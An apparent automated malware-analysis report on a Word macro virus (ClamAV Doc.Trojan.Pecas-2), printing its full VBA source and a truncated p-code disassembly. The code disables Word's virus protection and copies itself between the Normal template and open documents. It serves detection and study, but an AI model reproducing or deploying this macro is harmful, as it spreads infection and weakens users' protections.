MALICIOUS
Risk Score: 140
Malware Insights
MITRE ATT&CK: T1059.005 Visual Basic
The sample is identified as malicious by ClamAV with the signature Doc.Trojan.Pecas-2. It contains VBA macros that attempt to modify the Normal template and potentially spread to other documents. The macro also includes a hardcoded string 'pequitas te amo', which the Document_Close handler types into the active document when the day of the month is 13; it might be a lure or part of an obfuscation technique.
Heuristics 2
- ClamAV: Doc.Trojan.Pecas-2 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Pecas-2
- VBA macros detected (medium, OLE_VBA_MACROS): Document contains VBA macro code
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5490 bytes |

SHA-256: b58d8a3b067139e082657adc259a776cb650fb999e2acddc0042fc569c1fcb2c
Detection: ClamAV: Doc.Trojan.Pecas-2
Obfuscation or payload: unlikely
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "Pecas"
Attribute VB_Base = "1Normal.Pecas"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'by morris "vegueta"
'pequitas es mi novia
'mi viejo amigo " goto"
'dedicado para ti pequitas
'este virus tiene un bug en mi siguiente version lo solucionare
Private Sub Document_Close()
On Error Resume Next
Application.ScreenUpdating = False
Options.VirusProtection = (1 - 1)
Options.SaveNormalPrompt = (1 - 1)
Options.ConfirmConversions = (1 - 1)
Set plan = NormalTemplate.VBProject.VBComponents.Item(1)
Set activ = ActiveDocument.VBProject.VBComponents.Item(1)
Set temp = NormalTemplate.VBProject.VBComponents(1).CodeModule
bandera = 0
paso2:
cont = activ.CodeModule.countoflines
cont1 = plan.CodeModule.countoflines
var = plan.Name
If var = "Pecas" Then
If activ.Name <> "Pecas" Then
activ.CodeModule.DeleteLines 1, cont
activ.CodeModule.InsertLines 1, temp.lines(1, cont1)
activ.Name = plan.Name
If bandera = 0 Then
If InStr(1, ActiveDocument.Name, "Document") = 0 Then
If Day(Now) = 13 Then Selection.TypeText "pequitas te amo"
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
Else
ActiveDocument.Saved = True
End If
End If
End If
End If
bandera = bandera + 1
If bandera > 1 Then
Application.ScreenUpdating = False
Exit Sub
End If
Set activ = NormalTemplate.VBProject.VBComponents.Item(1)
Set plan = ActiveDocument.VBProject.VBComponents.Item(1)
Set temp = ActiveDocument.VBProject.VBComponents(1).CodeModule
GoTo paso2
End Sub
' Processing file: /opt/analyzer/scan_staging/deee8eb6b95b46209f0e5d85576b544f.bin
' ===============================================================================
' Module streams:
' Macros/VBA/Pecas - 3216 bytes
' Line #0:
' Line #1:
' QuoteRem 0x0000 0x0013 "by morris "vegueta""
' Line #2:
' QuoteRem 0x0000 0x0014 "pequitas es mi novia"
' Line #3:
' QuoteRem 0x0000 0x0016 "mi viejo amigo " goto""
' Line #4:
' QuoteRem 0x0000 0x0019 "dedicado para ti pequitas"
' Line #5:
' QuoteRem 0x0000 0x003E "este virus tiene un bug en mi siguiente version lo solucionare"
' Line #6:
' FuncDefn (Private Sub Document_Close())
' Line #7:
' OnError (Resume Next)
' Line #8:
' LitVarSpecial (False)
' Ld Application
' MemSt ScreenUpdating
' Line #9:
' LitDI2 0x0001
' LitDI2 0x0001
' Sub
' Paren
' Ld Options
' MemSt VirusProtection
' Line #10:
' LitDI2 0x0001
' LitDI2 0x0001
' Sub
' Paren
' Ld Options
' MemSt SaveNormalPrompt
' Line #11:
' LitDI2 0x0001
' LitDI2 0x0001
' Sub
' Paren
' Ld Options
' MemSt ConfirmConversions
' Line #12:
' SetStmt
' LitDI2 0x0001
' Ld NormalTemplate
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' Set plan
' Line #13:
' SetStmt
' LitDI2 0x0001
' Ld ActiveDocument
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' Set activ
' Line #14:
' SetStmt
' LitDI2 0x0001
' Ld NormalTemplate
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' Set temp
' Line #15:
' LitDI2 0x0000
' St bandera
' Line #16:
' Label paso2
' Line #17:
' Ld activ
' MemLd CodeModule
' MemLd countoflines
' St cont
' Line #18:
' Ld plan
' MemLd CodeModule
' MemLd countoflines
' St cont1
' Line #19:
' Ld plan
' MemLd New
' St var
' Line #20:
' Ld var
' LitStr 0x0005 "Pecas"
' Eq
' IfBlock
' Line #21:
' Ld activ
' MemLd New
' LitStr 0x0005 "Pecas"
' Ne
' IfBlock
' Line #22:
' LitDI2 0x0001
' Ld cont
' Ld activ
' MemLd CodeModule
' ArgsMemCall DeleteLines 0x0002
' Line #23:
' LitDI2 0x0001
' LitDI2 0x0001
' Ld cont1
' Ld temp
' ArgsMemLd lines 0x0002
' Ld activ
' MemLd CodeModule
' ArgsMemCall InsertLines 0x0002
' Line #24:
' Ld plan
' MemLd New
' Ld activ
' MemSt New
' Line #25:
' Ld bandera
' LitDI2 0x0000
' Eq
' IfBlock
' Line #26:
' LitDI2 0x0001
' Ld ActiveDocu
... (truncated)